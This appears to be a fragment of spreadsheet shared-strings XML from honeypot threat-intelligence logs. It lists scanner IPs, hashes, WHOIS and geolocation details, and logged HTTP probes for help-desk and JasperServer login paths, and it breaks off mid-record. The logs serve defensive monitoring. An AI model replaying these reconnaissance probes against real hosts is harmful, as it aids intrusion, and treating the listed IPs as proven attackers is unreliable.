  <si>
    <t>::ffff:ca53:36c1</t>
  </si>
  <si>
    <t>83ba3d61b5f0ab263d2edc22f1ea8bab</t>
  </si>
  <si>
    <t>185.243.96.105</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H19</t>
  </si>
  <si>
    <t>5900&amp;&amp;14894&amp;&amp;NA</t>
  </si>
  <si>
    <t>Dnipropetrovsk</t>
  </si>
  <si>
    <t>Dnipro rural raion</t>
  </si>
  <si>
    <t>Dnipro</t>
  </si>
  <si>
    <t>709930</t>
  </si>
  <si>
    <t>48.4647</t>
  </si>
  <si>
    <t>35.0462</t>
  </si>
  <si>
    <t>48693</t>
  </si>
  <si>
    <t>Rices Privately owned enterprise</t>
  </si>
  <si>
    <t>::ffff:b9f3:6069</t>
  </si>
  <si>
    <t>2352261cda5c56143f3f90e7ed4808c2</t>
  </si>
  <si>
    <t>82.208.21.194</t>
  </si>
  <si>
    <t>vmi1084073.contaboserver.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>5900&amp;&amp;62193&amp;&amp;59651&amp;&amp;55690&amp;&amp;53643&amp;&amp;57826&amp;&amp;65057&amp;&amp;54114&amp;&amp;53512&amp;&amp;54901</t>
  </si>
  <si>
    <t>51167</t>
  </si>
  <si>
    <t>Casablanca INT fraction</t>
  </si>
  <si>
    <t>Casablanca INT</t>
  </si>
  <si>
    <t>2003-09-16</t>
  </si>
  <si>
    <t>2017-03-05 07:28:42</t>
  </si>
  <si>
    <t>2026-03-05 07:28:42</t>
  </si>
  <si>
    <t>2025-03-06 08:06:31</t>
  </si>
  <si>
    <t>['NS1.CONTABO.NET', 'NS2.CONTABO.NET', 'NS3.CONTABO.NET']</t>
  </si>
  <si>
    <t>RegistryGate GmbH</t>
  </si>
  <si>
    <t>['abuse@registrygate.com', 'info@domain-contact.org']</t>
  </si>
  <si>
    <t>::ffff:52d0:15c2</t>
  </si>
  <si>
    <t>The attacker is scanning for available services and vulnerabilities, potentially identifying potential entry points into the network. They are also attempting to exploit these vulnerabilities by sending malicious requests. &amp;&amp; The attacker is attempting to scan and map the network, gathering information about available services and devices. They are also trying to exploit vulnerabilities in various protocols, such as FTP, HTTP, HTTPS, and others, by sending malicious requests and probes.</t>
  </si>
  <si>
    <t>Port scanning and exploitation attempts.  &amp;&amp; Port scanning, exploiting known vulnerabilities</t>
  </si>
  <si>
    <t>962a33ee1223c6b2b3159b5f39392ef8</t>
  </si>
  <si>
    <t>112.184.177.228</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;23</t>
  </si>
  <si>
    <t>None&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:70b8:b1e4</t>
  </si>
  <si>
    <t>66c9719ae4759e321d7a30850891dbf3</t>
  </si>
  <si>
    <t>220.134.49.57</t>
  </si>
  <si>
    <t>220-134-49-57.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>64866&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>2003-06-09</t>
  </si>
  <si>
    <t>::ffff:dc86:3139</t>
  </si>
  <si>
    <t>5263eadd924b1bd483d9af80f93df6f8</t>
  </si>
  <si>
    <t>185.180.140.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;ca-san-us-gd17-wk102b.internet-census.org</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H43&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_HTTPS_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;20041&amp;&amp;8443&amp;&amp;21525&amp;&amp;NA&amp;&amp;55883&amp;&amp;3389</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows 